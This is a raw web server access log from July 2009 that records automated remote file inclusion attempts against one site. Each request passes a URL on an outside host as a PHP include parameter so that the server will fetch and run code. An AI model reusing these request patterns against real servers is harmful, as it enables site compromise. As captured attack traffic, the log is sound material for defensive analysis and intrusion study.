195.34.78.110 - - [04/Jul/2009:19:46:52 -0700] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:52 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 621 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:52 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 627 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:52 -0700] "GET /logs/showfile.php/access_090617.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:52 -0700] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:57 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 621 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:58 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 627 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:58 -0700] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:46:58 -0700] "GET /logs/showfile.php/access_090617.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
66.71.241.146 - - [04/Jul/2009:19:47:00 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://hbulonline.com/v7id.txt??? HTTP/1.1" 404 590 "-" "libwww-perl/5.811" "webmaster-showcase.net"
66.71.241.146 - - [04/Jul/2009:19:47:00 -0700] "GET /logs/showfile.php/access_090202.log//admin/spaw/spaw_control.class.php?spaw_root=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "webmaster-showcase.net"
66.71.241.146 - - [04/Jul/2009:19:47:08 -0700] "GET /logs/showfile.php//admin/spaw/spaw_control.class.php?spaw_root=http://hbulonline.com/v7id.txt??? HTTP/1.1" 200 1595 "-" "libwww-perl/5.811" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:47:48 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 631 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:47:48 -0700] "GET /logs/showfile.php//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:47:48 -0700] "GET /logs/showfile.php/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [